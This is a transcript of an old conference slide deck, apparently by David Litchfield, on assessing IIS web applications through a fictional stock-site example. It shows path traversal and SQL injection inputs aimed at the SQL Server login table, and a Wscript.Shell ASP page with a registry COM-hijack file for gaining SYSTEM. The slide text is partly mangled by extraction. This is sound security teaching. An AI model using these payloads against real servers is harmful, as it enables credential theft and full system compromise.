Application Assessments on IIS - PowerPoint PPT Presentation

About This Presentation
Title:

Application Assessments on IIS

Description:

Title: PowerPoint Presentation Author: Nikos Livadas Last modified by: Jeff Moss Created Date: 6/26/2000 7:03:48 PM Document presentation format: On-screen Show – PowerPoint PPT presentation

Number of Views:76
Avg rating:3.0/5.0
Slides: 29
Provided by: Nikos150
Category:

less

Transcript and Presenter's Notes

Title: Application Assessments on IIS


1
Application Assessments on IIS
2
Welcome!
David Litchfield
(d.litchfield_at_atstake.com)
3
What is an Application Assessment?
Part of a network vulnerability assessment
Application provides the site functionality
Application is least tested but often proves to
be the greatest risk
4
Vulnerability Scanners
  • Cybercop
  • I. S. S.
  • Cerberus Internet Scanner

5
What scanners do do
They highlight known vulnerabilities in COTS
products
Webhits.dll and null.htw MSADC and RDS Ism.dll
and .htr overflow C0AF UNICODE issue
6
What scanners dont do
They wont assess your application
7
(No Transcript)
8
Assessing the Application
What services does the site offer?
What functionality exists to provide these
services?
What drives this functionality?
How does it do this?
9
Stocks-r-us.com
  • Free charting service of current/real-time
    market trends
  • A subscriber service providing detailed market
    analysis
  • An Ive forgot my password service
  • A contact service
  • Apply for a job with stocks-r-us.com online
    service

10
Free charting service of current/real-time market
trends
  • From a web form a user chooses the stock market
  • They also choose a time range
  • On Submitting a page called read_img.asp returns
    a graph
  • of the ups and downs of the market

http//www.stocks-r-us.com/read_img.asp?IDN000000
08IFNAXYZPQIFEpng
http//www.stocks-r-us.com/read_img.asp?IDNIFN
IFE
11
Exception Handling
ASP Error 800814 Create object failed in
/includes/olectra.inc
Downloading the .inc file reveals nothing but
there are two issues here bad exception handling
and .inc has not been mapped to asp.dll
A search on google reveals Olectra Chart
12
Source code revelation! Olectra creates a virtual
directory called /octemp
When a graph or chart is produced a temp
directory is created in the /octemp directory.
This directorys name is a number like 00000008
The dynamically produced graph is a random string
of letters such as AXYZPQ and has a file
extension of .png
/read_img.asp?IDN../IFNread_imgIFEasp
13
SQL Queries
strSQL select price from stocks where name
_ request.querystring(company)
This code is insecure!!!
Why?
14
By setting the company parameter to something
such as ISSX select from master..sysxlogins
Would execute the two queries in batch
mode Select price from stocks where name
ISSX Select from master..sysxlogins
sa login on MS SQL Server
xp_cmdshell extended stored procedure
15
On its own, ASP will not escape a single (quote
mark)
.idc files will.
Change all s provided in a parameter to 0x27 or
strip them out
16
Consideration for integer input
strSQL Select company from stocks where price
gt request.querystring(price)
Again we can insert an arbitrary SQL query here
and have it execute.
17
Verifying numeric input
IsNumeric() for VBScript NaN() fro JScript
18
r.f.p Rain Forest Puppy http//www.wiretrip.net
/rfp
19
Contact Service
lt .. SMTPObj GetObject( IIS//
request.servervariables(SERVER_NAME)
/SMTPSVC) .. gt
20
HTTP SERVER_NAME Poisoning
Host HTTP Client Header field
  • Learn the password hash for the IWAM account
  • Enumerate SQL servers
  • Proxy attacks
  • Samples on IIS
  • ADSI, Corba and COM

21
On-line job application service
As part of this service stocks-r-us.com allow
uploading of Curriculum Vitaes / Resumes Client
Side checking doesnt work Scripting enabled on
the /cvtemp virtual directory
22
Gaining SYSTEM Privileges using ASP
  • IIS Security Model
  • IUSR and IWAM accounts

23
Wscript.Shell Object
  • WSObj CreateObject(wscript.shell)
  • Read from the Registry
  • Write to the Regsitry
  • Execute commands

24
MSI.ASP
lt Dim WshShell, strCMD, result strCMD "cmd.exe
/c c\inetpub\wwwroot\msi.reg" strCMD2 "cmd.exe
/c c\inetpub\wwwroot\msi.msi" Set WshShell
Server.CreateObject("Wscript.Shell") On Error
Resume Next result WshShell.Run(strCMD) result
WshShell.Run(strCMD2) gt
25
MSI.REG
REGEDIT4 HKEY_CLASSES_ROOT\CLSID\000C103E-0000-
0000-C000-000000000046\InProcServer32 _at_"c\\ine
tpub\\wwwroot\\foo.dll" "ThreadingModel""Both"
26
Summary
  • Understand the technology youre dealing with
  • Never trust user input anywhere
  • Ensure permissions are set properly
  • Dont trust third-party software until truly
    evaluated
  • Dont rely on client side checking
  • Scanners wont find these problems you will

27
Questions?
28
Thanks and enjoy the rest the day!
Write a Comment
User Comments (0)
About PowerShow.com
Home About Us Terms and Conditions Privacy Policy Presentation Removal Request Contact Us
Copyright 2024 CrystalGraphics, Inc. — All rights Reserved. PowerShow.com is a trademark of CrystalGraphics, Inc.
The PowerPoint PPT presentation: "Application Assessments on IIS" is the property of its rightful owner.
Do you have PowerPoint slides to share? If so, share your PPT presentation slides online with PowerShow.com. It's FREE!